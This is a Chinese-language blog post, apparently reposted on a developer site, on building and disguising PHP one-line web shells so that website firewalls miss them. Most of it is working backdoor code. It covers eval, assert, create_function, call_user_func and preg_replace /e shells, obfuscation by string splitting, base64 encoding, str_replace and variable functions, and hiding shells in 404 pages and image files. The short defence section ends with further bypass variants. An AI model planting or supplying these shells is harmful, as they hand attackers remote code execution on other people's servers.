php一句话木马变形技巧

php一句话木马变形技巧一、什么是一句话木马?一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。二、我们如何发送命令,发送的命令如何执行?我们可以通过GET、POST、COOKIE这三种方式向一个网站提交数据,一句话木马用$_GET[”]、$_POST[”]、$_COOKIE[‘…

大家好,又见面了,我是你们的朋友全栈君。

一、什么是一句话木马?

一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。

二、我们如何发送命令,发送的命令如何执行?

我们可以通过 GET、POST、COOKIE这三种方式向一个网站提交数据,一句话木马用 $_GET[' ']、$_POST[' ']、$_COOKIE[' ']接收我们传递的数据,并把接收的数据传递给一句话木马中执行命令的函数,进而执行命令。 所以看到的经典一句话木马大多都是只有两个部分,一个是可以执行代码的函数部分,一个是接收数据的部分。

0.eval函数

<?php eval($_POST['a']) ?>

其中eval就是执行命令的函数,**$_POST[‘a’]**就是接收的数据。eval函数把接收的数据当作PHP代码来执行。这样我们就能够让插入了一句话木马的网站执行我们传递过去的任意PHP语句。这便是一句话木马的强大之处。

因为木马是接收post请求中 “a” 的数据( $_POST[‘a’]),所以我们必须以post方法发送数据并且将我们要执行的代码赋值给“a”。如果把木马中的post替换成get,那么我么就需要以GET方法发送“a”,

使用 其他函数制作一句话木马

1.assert函数

<?php assert(@$_POST['a']); ?>

2.create_function函数

<?php
$fun = create_function('',$_POST['a']);
$fun();
?>

把用户传递的数据生成一个函数fun(),然后再执行fun()

3. call_user_func回调函数

<?php
@call_user_func(assert,$_POST['a']);
?>

call_user_func这个函数可以调用其它函数,被调用的函数是call_user_func的第一个函数,被调用的函数的参数是call_user_func的第二个参数

这样的一个语句也可以完成一句话木马。一些被waf拦截的木马可以配合这个函数绕过waf。

4.preg_replace函数

<?php
@preg_replace("/abcde/e", $_POST['a'], "abcdefg");
?>

这个函数原本是利用正则表达式替换符合条件的字符串,但是这个函数有一个功能——可执行命令

这个函数的第一个参数是正则表达式,按照PHP的格式,表达式在两个“/”之间。如果我们在这个表达式的末尾加上“e”,那么这个函数的第二个参数就会被当作代码执行。

5. file_put_contents函数

利用函数生成木马

<?php
$test='<?php $a=$_POST["cmd"];assert($a); ?>';
file_put_contents("Trojan.php", $test);
?>

函数功能:生成一个文件,第一个参数是文件名,第二个参数是文件的内容。

6.array数组

<?php
$a='assert';
array_map("$a",$_REQUEST);
?>

上述定义参数a并赋值‘assert’,利用array_map()函数将执行语句进行拼接。最终实现assert($_REQUEST)

<?php
$item['JON']='assert';
$array[]=$item;
$array[0]['JON']($_POST["TEST"]);
?>

利用函数的组合效果,使得多个参数在传递后组合成一段命令并执行。

在这里插入图片描述
在这里插入图片描述

7.PHP变量函数

<?php
$a = "eval";
$a(@$_POST['a']);
?>

第三行使用了变量函数$a,变量储存了函数名eval,便可以直接用变量替代函数名。

三、如何让一句话木马绕过waf ?

waf是网站的防火墙,例如安全狗就是waf的一种。waf通常以关键字判断是否为一句话木马,但是一句话木马的变形有很多种,waf根本不可能全部拦截。想要绕过waf,需要掌握各种PHP小技巧,掌握的技巧多了,把技巧结合起来,设计出属于自己的一句话木马。

2.PHP可变变量

<?php
$bb="eval";
$aa="bb";
$$aa($_POST['a']);
?>

看这句就能理解上述语句:$$aa = ( ( (aa) = $ (‘bb’) = $bb = “eval”

3.str_replace函数

<?php
$a=str_replace("Waldo", "", "eWaldoval");
$a(@$_POST['a']);
?>

函数功能:在第三个参数中,查找第一个参数,并替换成第二个参数。这里第二个参数为空字符串,就相当于删除”Waldo”。

4. base64_decode函数

<?php
$a=base64_decode("ZXZhbA==")
$a($_POST['a']);
?>

这里是base64解密函数,”ZXZhbA==”是eval的base64加密。

5.”.”操作符

<?php
$a="e"."v";
$b="a"."l";
$c=$a.$b;
$c($_POST['a']);
?>

6.parse_str函数

<?php
$str="a=eval";
parse_str($str);
$a($_POST['a']);
?>

执行这个函数后,生成一个变量$a,值为字符串”eval”

7.更换数据来源

7.1GET篇

<?php $_GET[a]($_GET[b]);  ?>

<?php @eval( $_GET[$_GET[b]])>

利用方法:

b=cmd&cmd=phpinfo()

7.2利用script代替<? 、?>标签

<script language="php">@eval_r($_GET[b])</script>

7.3利用session

在这里插入图片描述

8.字符替换或特殊编码

在这里插入图片描述
在这里插入图片描述

9.木马藏匿

1.404页面

2.图片木马,用文件包含调用

四、总结

绕过技巧:

  • 更换执行数据来源
  • 字符替换或者编码
  • 采取隐匿手段

tips:使用一句话木马的时候可以在函数前加”@”符,这个符号让php语句不显示错误信息,增加隐蔽性。

五、防御

1.禁用assert()函数,监控eval()
2.搜索日志的assert。
亦可能绕过:

<?php $c=$_GET[n].'t';
 @$c($_POST[cmd]);
 ?>
<?php $c=base64_decode('YXNzZXI=').$_GET[n].'t';
 @$c($_POST[cmd]);
 ?>

在这里插入图片描述

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/143417.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • UML——类图

    UML——类图UML——类图

  • Batch Normalization批量归一化[通俗易懂]

    Batch Normalization批量归一化[通俗易懂]深度学习捷报连连、声名鹊起,随机梯度下降成了训练深度网络的主流方法。尽管随机梯度下降法对于训练深度网络简单高效,但是它有个毛病,就是需要我们人为的去选择参数,比如学习率、参数初始化、权重衰减系数、Dropout比例等。这些参数的选择对训练结果至关重要,以至于我们很多时间都浪费在这些的调参上。那么学完这篇文献之后,你可以不需要那么刻意的慢慢调整参数。批量标准化一般用在非线性…

  • 利用uWSGI和nginx进行服务器部署

    利用uWSGI和nginx进行服务器部署

    2021年11月21日
  • Springboot集成RocketMQ

    Springboot集成RocketMQ什么是RocketMQ?官方说明:随着使用越来越多的队列和虚拟主题,ActiveMQIO模块遇到了瓶颈。我们尽力通过节流,断路器或降级来解决此问题,但效果不佳。因此,我们那时开始关注流行的消息传递解决方案Kafka。不幸的是,Kafka不能满足我们的要求,特别是在低延迟和高可靠性方面。看到这里可以很清楚的知道RcoketMQ是一款低延迟、高可靠、可伸缩、易于使用的消息中间件。具…

  • 通过nginx日志统计一段时间内ip的访问次数进行排序&访问量统计

    通过nginx日志统计一段时间内ip的访问次数进行排序&访问量统计

  • Java volatile关键字作用

    Java volatile关键字作用当一个共享变量被volatile修饰时,它会保证修改的值立即被更新到主存“,这里的”保证“是如何做到的?和JIT的具体编译后的CPU指令相关吧?  volatile特性  内存可见性:通俗来说就是,线程A对一个volatile变量的修改,对于其它线程来说是可见的,即线程每次获取volatile变量的值都是最新的。  volatile的使用场景  通过关键字sychronize…

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号